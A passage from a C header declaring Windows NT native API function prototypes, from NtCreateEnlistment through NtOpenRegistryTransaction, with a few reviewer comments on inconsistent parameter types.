IN ULONG EnclaveType,
IN PVOID EnclaveInformation,
IN ULONG EnclaveInformationLength,
OUT PULONG EnclaveError OPTIONAL);
EXTERN_C NTSTATUS NtCreateEnlistment(
OUT PHANDLE EnlistmentHandle,
IN ACCESS_MASK DesiredAccess,
IN HANDLE ResourceManagerHandle,
IN HANDLE TransactionHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG CreateOptions OPTIONAL,
IN NOTIFICATION_MASK NotificationMask,
IN PVOID EnlistmentKey OPTIONAL);
EXTERN_C NTSTATUS NtCreateEventPair(
OUT PHANDLE EventPairHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);
EXTERN_C NTSTATUS NtCreateIRTimer(
OUT PHANDLE TimerHandle,
IN ACCESS_MASK DesiredAccess);
EXTERN_C NTSTATUS NtCreateIoCompletion(
OUT PHANDLE IoCompletionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG Count OPTIONAL);
EXTERN_C NTSTATUS NtCreateJobObject(
OUT PHANDLE JobHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);
EXTERN_C NTSTATUS NtCreateJobSet(
IN ULONG NumJob,
IN PJOB_SET_ARRAY UserJobSet,
IN ULONG Flags);
EXTERN_C NTSTATUS NtCreateKeyTransacted(
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG TitleIndex,
IN PUNICODE_STRING Class OPTIONAL,
IN ULONG CreateOptions,
IN HANDLE TransactionHandle,
OUT PULONG Disposition OPTIONAL);
EXTERN_C NTSTATUS NtCreateKeyedEvent(
OUT PHANDLE KeyedEventHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG Flags);
// NOTE(review): HandleCount implies Handles is an array, yet it is declared as
// a single `HANDLE` (compare NtCompactKeys); presumably should be PHANDLE.
EXTERN_C NTSTATUS NtCreateLowBoxToken(
OUT PHANDLE TokenHandle,
IN HANDLE ExistingTokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PSID PackageSid,
IN ULONG CapabilityCount,
IN PSID_AND_ATTRIBUTES Capabilities OPTIONAL,
IN ULONG HandleCount,
IN HANDLE Handles OPTIONAL);
EXTERN_C NTSTATUS NtCreateMailslotFile(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG CreateOptions,
IN ULONG MailslotQuota,
IN ULONG MaximumMessageSize,
IN PLARGE_INTEGER ReadTimeout);
EXTERN_C NTSTATUS NtCreateMutant(
OUT PHANDLE MutantHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN BOOLEAN InitialOwner);
EXTERN_C NTSTATUS NtCreateNamedPipeFile(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN BOOLEAN NamedPipeType,
IN BOOLEAN ReadMode,
IN BOOLEAN CompletionMode,
IN ULONG MaximumInstances,
IN ULONG InboundQuota,
IN ULONG OutboundQuota,
IN PLARGE_INTEGER DefaultTimeout OPTIONAL);
EXTERN_C NTSTATUS NtCreatePagingFile(
IN PUNICODE_STRING PageFileName,
IN PULARGE_INTEGER MinimumSize,
IN PULARGE_INTEGER MaximumSize,
IN ULONG Priority);
EXTERN_C NTSTATUS NtCreatePartition(
OUT PHANDLE PartitionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG PreferredNode);
EXTERN_C NTSTATUS NtCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG MaxConnectionInfoLength,
IN ULONG MaxMessageLength,
IN ULONG MaxPoolUsage OPTIONAL);
EXTERN_C NTSTATUS NtCreatePrivateNamespace(
OUT PHANDLE NamespaceHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PVOID BoundaryDescriptor);
EXTERN_C NTSTATUS NtCreateProcess(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ParentProcess,
IN BOOLEAN InheritObjectTable,
IN HANDLE SectionHandle OPTIONAL,
IN HANDLE DebugPort OPTIONAL,
IN HANDLE ExceptionPort OPTIONAL);
EXTERN_C NTSTATUS NtCreateProfile(
OUT PHANDLE ProfileHandle,
IN HANDLE Process OPTIONAL,
IN PVOID ProfileBase,
IN ULONG ProfileSize,
IN ULONG BucketSize,
IN PULONG Buffer,
IN ULONG BufferSize,
IN KPROFILE_SOURCE ProfileSource,
IN ULONG Affinity);
EXTERN_C NTSTATUS NtCreateProfileEx(
OUT PHANDLE ProfileHandle,
IN HANDLE Process OPTIONAL,
IN PVOID ProfileBase,
IN SIZE_T ProfileSize,
IN ULONG BucketSize,
IN PULONG Buffer,
IN ULONG BufferSize,
IN KPROFILE_SOURCE ProfileSource,
IN USHORT GroupCount,
IN PGROUP_AFFINITY GroupAffinity);
// Flags is `DWORD` here while the rest of this list uses `ULONG`; same width,
// mixed vocabulary.
EXTERN_C NTSTATUS NtCreateRegistryTransaction(
OUT PHANDLE Handle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN DWORD Flags);
EXTERN_C NTSTATUS NtCreateResourceManager(
OUT PHANDLE ResourceManagerHandle,
IN ACCESS_MASK DesiredAccess,
IN HANDLE TmHandle,
IN LPGUID RmGuid,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG CreateOptions OPTIONAL,
IN PUNICODE_STRING Description OPTIONAL);
EXTERN_C NTSTATUS NtCreateSemaphore(
OUT PHANDLE SemaphoreHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN LONG InitialCount,
IN LONG MaximumCount);
EXTERN_C NTSTATUS NtCreateSymbolicLinkObject(
OUT PHANDLE LinkHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PUNICODE_STRING LinkTarget);
// Note the extended form takes the start routine as a bare `PVOID` (no
// typed thread-start signature) and an optional PS_ATTRIBUTE_LIST.
EXTERN_C NTSTATUS NtCreateThreadEx(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
IN PVOID StartRoutine,
IN PVOID Argument OPTIONAL,
IN ULONG CreateFlags,
IN SIZE_T ZeroBits,
IN SIZE_T StackSize,
IN SIZE_T MaximumStackSize,
IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);
EXTERN_C NTSTATUS NtCreateTimer(
OUT PHANDLE TimerHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN TIMER_TYPE TimerType);
EXTERN_C NTSTATUS NtCreateTimer2(
OUT PHANDLE TimerHandle,
IN PVOID Reserved1 OPTIONAL,
IN PVOID Reserved2 OPTIONAL,
IN ULONG Attributes,
IN ACCESS_MASK DesiredAccess);
EXTERN_C NTSTATUS NtCreateToken(
OUT PHANDLE TokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN TOKEN_TYPE TokenType,
IN PLUID AuthenticationId,
IN PLARGE_INTEGER ExpirationTime,
IN PTOKEN_USER User,
IN PTOKEN_GROUPS Groups,
IN PTOKEN_PRIVILEGES Privileges,
IN PTOKEN_OWNER Owner OPTIONAL,
IN PTOKEN_PRIMARY_GROUP PrimaryGroup,
IN PTOKEN_DEFAULT_DACL DefaultDacl OPTIONAL,
IN PTOKEN_SOURCE TokenSource);
EXTERN_C NTSTATUS NtCreateTokenEx(
OUT PHANDLE TokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN TOKEN_TYPE TokenType,
IN PLUID AuthenticationId,
IN PLARGE_INTEGER ExpirationTime,
IN PTOKEN_USER User,
IN PTOKEN_GROUPS Groups,
IN PTOKEN_PRIVILEGES Privileges,
IN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION UserAttributes OPTIONAL,
IN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION DeviceAttributes OPTIONAL,
IN PTOKEN_GROUPS DeviceGroups OPTIONAL,
IN PTOKEN_MANDATORY_POLICY TokenMandatoryPolicy OPTIONAL,
IN PTOKEN_OWNER Owner OPTIONAL,
IN PTOKEN_PRIMARY_GROUP PrimaryGroup,
IN PTOKEN_DEFAULT_DACL DefaultDacl OPTIONAL,
IN PTOKEN_SOURCE TokenSource);
EXTERN_C NTSTATUS NtCreateTransaction(
OUT PHANDLE TransactionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN LPGUID Uow OPTIONAL,
IN HANDLE TmHandle OPTIONAL,
IN ULONG CreateOptions OPTIONAL,
IN ULONG IsolationLevel OPTIONAL,
IN ULONG IsolationFlags OPTIONAL,
IN PLARGE_INTEGER Timeout OPTIONAL,
IN PUNICODE_STRING Description OPTIONAL);
EXTERN_C NTSTATUS NtCreateTransactionManager(
OUT PHANDLE TmHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PUNICODE_STRING LogFileName OPTIONAL,
IN ULONG CreateOptions OPTIONAL,
IN ULONG CommitStrength OPTIONAL);
EXTERN_C NTSTATUS NtCreateUserProcess(
OUT PHANDLE ProcessHandle,
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK ProcessDesiredAccess,
IN ACCESS_MASK ThreadDesiredAccess,
IN POBJECT_ATTRIBUTES ProcessObjectAttributes OPTIONAL,
IN POBJECT_ATTRIBUTES ThreadObjectAttributes OPTIONAL,
IN ULONG ProcessFlags,
IN ULONG ThreadFlags,
IN PVOID ProcessParameters OPTIONAL,
IN OUT PPS_CREATE_INFO CreateInfo,
IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);
EXTERN_C NTSTATUS NtCreateWaitCompletionPacket(
OUT PHANDLE WaitCompletionPacketHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);
EXTERN_C NTSTATUS NtCreateWaitablePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN ULONG MaxConnectionInfoLength,
IN ULONG MaxMessageLength,
IN ULONG MaxPoolUsage OPTIONAL);
EXTERN_C NTSTATUS NtCreateWnfStateName(
OUT PCWNF_STATE_NAME StateName,
IN WNF_STATE_NAME_LIFETIME NameLifetime,
IN WNF_DATA_SCOPE DataScope,
IN BOOLEAN PersistData,
IN PCWNF_TYPE_ID TypeId OPTIONAL,
IN ULONG MaximumStateSize,
IN PSECURITY_DESCRIPTOR SecurityDescriptor);
EXTERN_C NTSTATUS NtCreateWorkerFactory(
OUT PHANDLE WorkerFactoryHandleReturn,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE CompletionPortHandle,
IN HANDLE WorkerProcessHandle,
IN PVOID StartRoutine,
IN PVOID StartParameter OPTIONAL,
IN ULONG MaxThreadCount OPTIONAL,
IN SIZE_T StackReserve OPTIONAL,
IN SIZE_T StackCommit OPTIONAL);
EXTERN_C NTSTATUS NtDebugActiveProcess(
IN HANDLE ProcessHandle,
IN HANDLE DebugObjectHandle);
EXTERN_C NTSTATUS NtDebugContinue(
IN HANDLE DebugObjectHandle,
IN PCLIENT_ID ClientId,
IN NTSTATUS ContinueStatus);
EXTERN_C NTSTATUS NtDeleteAtom(
IN USHORT Atom);
EXTERN_C NTSTATUS NtDeleteBootEntry(
IN ULONG Id);
EXTERN_C NTSTATUS NtDeleteDriverEntry(
IN ULONG Id);
EXTERN_C NTSTATUS NtDeleteFile(
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtDeleteKey(
IN HANDLE KeyHandle);
EXTERN_C NTSTATUS NtDeleteObjectAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN BOOLEAN GenerateOnClose);
EXTERN_C NTSTATUS NtDeletePrivateNamespace(
IN HANDLE NamespaceHandle);
EXTERN_C NTSTATUS NtDeleteValueKey(
IN HANDLE KeyHandle,
IN PUNICODE_STRING ValueName);
EXTERN_C NTSTATUS NtDeleteWnfStateData(
IN PCWNF_STATE_NAME StateName,
IN PVOID ExplicitScope OPTIONAL);
EXTERN_C NTSTATUS NtDeleteWnfStateName(
IN PCWNF_STATE_NAME StateName);
EXTERN_C NTSTATUS NtDisableLastKnownGood();
EXTERN_C NTSTATUS NtDisplayString(
IN PUNICODE_STRING String);
EXTERN_C NTSTATUS NtDrawText(
IN PUNICODE_STRING String);
EXTERN_C NTSTATUS NtEnableLastKnownGood();
EXTERN_C NTSTATUS NtEnumerateBootEntries(
OUT PVOID Buffer OPTIONAL,
IN OUT PULONG BufferLength);
EXTERN_C NTSTATUS NtEnumerateDriverEntries(
OUT PVOID Buffer OPTIONAL,
IN OUT PULONG BufferLength);
EXTERN_C NTSTATUS NtEnumerateSystemEnvironmentValuesEx(
IN ULONG InformationClass,
OUT PVOID Buffer,
IN OUT PULONG BufferLength);
EXTERN_C NTSTATUS NtEnumerateTransactionObject(
IN HANDLE RootObjectHandle OPTIONAL,
IN KTMOBJECT_TYPE QueryType,
IN OUT PKTMOBJECT_CURSOR ObjectCursor,
IN ULONG ObjectCursorLength,
OUT PULONG ReturnLength);
EXTERN_C NTSTATUS NtExtendSection(
IN HANDLE SectionHandle,
IN OUT PLARGE_INTEGER NewSectionSize);
EXTERN_C NTSTATUS NtFilterBootOption(
IN FILTER_BOOT_OPTION_OPERATION FilterOperation,
IN ULONG ObjectType,
IN ULONG ElementType,
IN PVOID SystemData OPTIONAL,
IN ULONG DataSize);
EXTERN_C NTSTATUS NtFilterToken(
IN HANDLE ExistingTokenHandle,
IN ULONG Flags,
IN PTOKEN_GROUPS SidsToDisable OPTIONAL,
IN PTOKEN_PRIVILEGES PrivilegesToDelete OPTIONAL,
IN PTOKEN_GROUPS RestrictedSids OPTIONAL,
OUT PHANDLE NewTokenHandle);
EXTERN_C NTSTATUS NtFilterTokenEx(
IN HANDLE TokenHandle,
IN ULONG Flags,
IN PTOKEN_GROUPS SidsToDisable OPTIONAL,
IN PTOKEN_PRIVILEGES PrivilegesToDelete OPTIONAL,
IN PTOKEN_GROUPS RestrictedSids OPTIONAL,
IN ULONG DisableUserClaimsCount,
IN PUNICODE_STRING UserClaimsToDisable OPTIONAL,
IN ULONG DisableDeviceClaimsCount,
IN PUNICODE_STRING DeviceClaimsToDisable OPTIONAL,
IN PTOKEN_GROUPS DeviceGroupsToDisable OPTIONAL,
IN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION RestrictedUserAttributes OPTIONAL,
IN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION RestrictedDeviceAttributes OPTIONAL,
IN PTOKEN_GROUPS RestrictedDeviceGroups OPTIONAL,
OUT PHANDLE NewTokenHandle);
EXTERN_C NTSTATUS NtFlushBuffersFileEx(
IN HANDLE FileHandle,
IN ULONG Flags,
IN PVOID Parameters,
IN ULONG ParametersSize,
OUT PIO_STATUS_BLOCK IoStatusBlock);
EXTERN_C NTSTATUS NtFlushInstallUILanguage(
IN LANGID InstallUILanguage,
IN ULONG SetComittedFlag);
EXTERN_C NTSTATUS NtFlushInstructionCache(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress OPTIONAL,
IN ULONG Length);
EXTERN_C NTSTATUS NtFlushKey(
IN HANDLE KeyHandle);
EXTERN_C NTSTATUS NtFlushProcessWriteBuffers();
EXTERN_C NTSTATUS NtFlushVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID BaseAddress,
IN OUT PULONG RegionSize,
OUT PIO_STATUS_BLOCK IoStatusBlock);
EXTERN_C NTSTATUS NtFlushWriteBuffer();
EXTERN_C NTSTATUS NtFreeUserPhysicalPages(
IN HANDLE ProcessHandle,
IN OUT PULONG NumberOfPages,
IN PULONG UserPfnArray);
EXTERN_C NTSTATUS NtFreezeRegistry(
IN ULONG TimeOutInSeconds);
EXTERN_C NTSTATUS NtFreezeTransactions(
IN PLARGE_INTEGER FreezeTimeout,
IN PLARGE_INTEGER ThawTimeout);
EXTERN_C NTSTATUS NtGetCachedSigningLevel(
IN HANDLE File,
OUT PULONG Flags,
OUT PSE_SIGNING_LEVEL SigningLevel,
OUT PUCHAR Thumbprint OPTIONAL,
IN OUT PULONG ThumbprintSize OPTIONAL,
OUT PULONG ThumbprintAlgorithm OPTIONAL);
EXTERN_C NTSTATUS NtGetCompleteWnfStateSubscription(
IN PCWNF_STATE_NAME OldDescriptorStateName OPTIONAL,
IN PLARGE_INTEGER OldSubscriptionId OPTIONAL,
IN ULONG OldDescriptorEventMask OPTIONAL,
IN ULONG OldDescriptorStatus OPTIONAL,
OUT PWNF_DELIVERY_DESCRIPTOR NewDeliveryDescriptor,
IN ULONG DescriptorSize);
EXTERN_C NTSTATUS NtGetContextThread(
IN HANDLE ThreadHandle,
IN OUT PCONTEXT ThreadContext);
EXTERN_C NTSTATUS NtGetCurrentProcessorNumber();
EXTERN_C NTSTATUS NtGetCurrentProcessorNumberEx(
OUT PULONG ProcNumber OPTIONAL);
EXTERN_C NTSTATUS NtGetDevicePowerState(
IN HANDLE Device,
OUT PDEVICE_POWER_STATE State);
EXTERN_C NTSTATUS NtGetMUIRegistryInfo(
IN ULONG Flags,
IN OUT PULONG DataSize,
OUT PVOID SystemData);
EXTERN_C NTSTATUS NtGetNextProcess(
IN HANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN ULONG HandleAttributes,
IN ULONG Flags,
OUT PHANDLE NewProcessHandle);
EXTERN_C NTSTATUS NtGetNextThread(
IN HANDLE ProcessHandle,
IN HANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN ULONG HandleAttributes,
IN ULONG Flags,
OUT PHANDLE NewThreadHandle);
EXTERN_C NTSTATUS NtGetNlsSectionPtr(
IN ULONG SectionType,
IN ULONG SectionData,
IN PVOID ContextData,
OUT PVOID SectionPointer,
OUT PULONG SectionSize);
EXTERN_C NTSTATUS NtGetNotificationResourceManager(
IN HANDLE ResourceManagerHandle,
OUT PTRANSACTION_NOTIFICATION TransactionNotification,
IN ULONG NotificationLength,
IN PLARGE_INTEGER Timeout OPTIONAL,
OUT PULONG ReturnLength OPTIONAL,
IN ULONG Asynchronous,
IN ULONG AsynchronousContext OPTIONAL);
EXTERN_C NTSTATUS NtGetWriteWatch(
IN HANDLE ProcessHandle,
IN ULONG Flags,
IN PVOID BaseAddress,
IN ULONG RegionSize,
OUT PULONG UserAddressArray,
IN OUT PULONG EntriesInUserAddressArray,
OUT PULONG Granularity);
EXTERN_C NTSTATUS NtImpersonateAnonymousToken(
IN HANDLE ThreadHandle);
EXTERN_C NTSTATUS NtImpersonateThread(
IN HANDLE ServerThreadHandle,
IN HANDLE ClientThreadHandle,
IN PSECURITY_QUALITY_OF_SERVICE SecurityQos);
EXTERN_C NTSTATUS NtInitializeEnclave(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PVOID EnclaveInformation,
IN ULONG EnclaveInformationLength,
OUT PULONG EnclaveError OPTIONAL);
EXTERN_C NTSTATUS NtInitializeNlsFiles(
OUT PVOID BaseAddress,
OUT PLCID DefaultLocaleId,
OUT PLARGE_INTEGER DefaultCasingTableSize);
EXTERN_C NTSTATUS NtInitializeRegistry(
IN USHORT BootCondition);
EXTERN_C NTSTATUS NtInitiatePowerAction(
IN POWER_ACTION SystemAction,
IN SYSTEM_POWER_STATE LightestSystemState,
IN ULONG Flags,
IN BOOLEAN Asynchronous);
EXTERN_C NTSTATUS NtIsSystemResumeAutomatic();
EXTERN_C NTSTATUS NtIsUILanguageComitted();
EXTERN_C NTSTATUS NtListenPort(
IN HANDLE PortHandle,
OUT PPORT_MESSAGE ConnectionRequest);
EXTERN_C NTSTATUS NtLoadDriver(
IN PUNICODE_STRING DriverServiceName);
EXTERN_C NTSTATUS NtLoadEnclaveData(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PVOID Buffer,
IN SIZE_T BufferSize,
IN ULONG Protect,
IN PVOID PageInformation,
IN ULONG PageInformationLength,
OUT PSIZE_T NumberOfBytesWritten OPTIONAL,
OUT PULONG EnclaveError OPTIONAL);
EXTERN_C NTSTATUS NtLoadHotPatch(
IN PUNICODE_STRING HotPatchName,
IN ULONG LoadFlag);
EXTERN_C NTSTATUS NtLoadKey(
IN POBJECT_ATTRIBUTES TargetKey,
IN POBJECT_ATTRIBUTES SourceFile);
EXTERN_C NTSTATUS NtLoadKey2(
IN POBJECT_ATTRIBUTES TargetKey,
IN POBJECT_ATTRIBUTES SourceFile,
IN ULONG Flags);
EXTERN_C NTSTATUS NtLoadKeyEx(
IN POBJECT_ATTRIBUTES TargetKey,
IN POBJECT_ATTRIBUTES SourceFile,
IN ULONG Flags,
IN HANDLE TrustClassKey OPTIONAL,
IN HANDLE Event OPTIONAL,
IN ACCESS_MASK DesiredAccess OPTIONAL,
OUT PHANDLE RootHandle OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatus OPTIONAL);
EXTERN_C NTSTATUS NtLockFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PULARGE_INTEGER ByteOffset,
IN PULARGE_INTEGER Length,
IN ULONG Key,
IN BOOLEAN FailImmediately,
IN BOOLEAN ExclusiveLock);
EXTERN_C NTSTATUS NtLockProductActivationKeys(
IN OUT PULONG pPrivateVer OPTIONAL,
OUT PULONG pSafeMode OPTIONAL);
EXTERN_C NTSTATUS NtLockRegistryKey(
IN HANDLE KeyHandle);
EXTERN_C NTSTATUS NtLockVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PULONG RegionSize,
IN ULONG MapType);
EXTERN_C NTSTATUS NtMakePermanentObject(
IN HANDLE Handle);
EXTERN_C NTSTATUS NtMakeTemporaryObject(
IN HANDLE Handle);
EXTERN_C NTSTATUS NtManagePartition(
IN HANDLE TargetHandle,
IN HANDLE SourceHandle,
IN MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,
IN OUT PVOID PartitionInformation,
IN ULONG PartitionInformationLength);
EXTERN_C NTSTATUS NtMapCMFModule(
IN ULONG What,
IN ULONG Index,
OUT PULONG CacheIndexOut OPTIONAL,
OUT PULONG CacheFlagsOut OPTIONAL,
OUT PULONG ViewSizeOut OPTIONAL,
OUT PVOID BaseAddress OPTIONAL);
EXTERN_C NTSTATUS NtMapUserPhysicalPages(
IN PVOID VirtualAddress,
IN PULONG NumberOfPages,
IN PULONG UserPfnArray OPTIONAL);
EXTERN_C NTSTATUS NtMapViewOfSectionEx(
IN HANDLE SectionHandle,
IN HANDLE ProcessHandle,
IN OUT PLARGE_INTEGER SectionOffset,
IN OUT PPVOID BaseAddress,
IN OUT PSIZE_T ViewSize,
IN ULONG AllocationType,
IN ULONG Protect,
IN OUT PVOID DataBuffer OPTIONAL,
IN ULONG DataCount);
EXTERN_C NTSTATUS NtModifyBootEntry(
IN PBOOT_ENTRY BootEntry);
EXTERN_C NTSTATUS NtModifyDriverEntry(
IN PEFI_DRIVER_ENTRY DriverEntry);
EXTERN_C NTSTATUS NtNotifyChangeDirectoryFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PFILE_NOTIFY_INFORMATION Buffer,
IN ULONG Length,
IN ULONG CompletionFilter,
IN BOOLEAN WatchTree);
EXTERN_C NTSTATUS NtNotifyChangeDirectoryFileEx(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID Buffer,
IN ULONG Length,
IN ULONG CompletionFilter,
IN BOOLEAN WatchTree,
IN DIRECTORY_NOTIFY_INFORMATION_CLASS DirectoryNotifyInformationClass OPTIONAL);
EXTERN_C NTSTATUS NtNotifyChangeKey(
IN HANDLE KeyHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG CompletionFilter,
IN BOOLEAN WatchTree,
OUT PVOID Buffer OPTIONAL,
IN ULONG BufferSize,
IN BOOLEAN Asynchronous);
EXTERN_C NTSTATUS NtNotifyChangeMultipleKeys(
IN HANDLE MasterKeyHandle,
IN ULONG Count OPTIONAL,
IN POBJECT_ATTRIBUTES SubordinateObjects OPTIONAL,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG CompletionFilter,
IN BOOLEAN WatchTree,
OUT PVOID Buffer OPTIONAL,
IN ULONG BufferSize,
IN BOOLEAN Asynchronous);
EXTERN_C NTSTATUS NtNotifyChangeSession(
IN HANDLE SessionHandle,
IN ULONG ChangeSequenceNumber,
IN PLARGE_INTEGER ChangeTimeStamp,
IN IO_SESSION_EVENT Event,
IN IO_SESSION_STATE NewState,
IN IO_SESSION_STATE PreviousState,
IN PVOID Payload OPTIONAL,
IN ULONG PayloadSize);
EXTERN_C NTSTATUS NtOpenEnlistment(
OUT PHANDLE EnlistmentHandle,
IN ACCESS_MASK DesiredAccess,
IN HANDLE ResourceManagerHandle,
IN LPGUID EnlistmentGuid,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);
EXTERN_C NTSTATUS NtOpenEventPair(
OUT PHANDLE EventPairHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenIoCompletion(
OUT PHANDLE IoCompletionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenJobObject(
OUT PHANDLE JobHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenKeyEx(
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG OpenOptions);
EXTERN_C NTSTATUS NtOpenKeyTransacted(
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN HANDLE TransactionHandle);
EXTERN_C NTSTATUS NtOpenKeyTransactedEx(
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG OpenOptions,
IN HANDLE TransactionHandle);
EXTERN_C NTSTATUS NtOpenKeyedEvent(
OUT PHANDLE KeyedEventHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenMutant(
OUT PHANDLE MutantHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenObjectAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN PUNICODE_STRING ObjectTypeName,
IN PUNICODE_STRING ObjectName,
IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
IN HANDLE ClientToken,
IN ACCESS_MASK DesiredAccess,
IN ACCESS_MASK GrantedAccess,
IN PPRIVILEGE_SET Privileges OPTIONAL,
IN BOOLEAN ObjectCreation,
IN BOOLEAN AccessGranted,
OUT PBOOLEAN GenerateOnClose);
EXTERN_C NTSTATUS NtOpenPartition(
OUT PHANDLE PartitionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenPrivateNamespace(
OUT PHANDLE NamespaceHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PVOID BoundaryDescriptor);
EXTERN_C NTSTATUS NtOpenProcessToken(
IN HANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
OUT PHANDLE TokenHandle);
EXTERN_C NTSTATUS NtOpenRegistryTransaction(
OUT PHANDLE RegistryHandle,
IN ACCESS_MASK DesiredAccess,
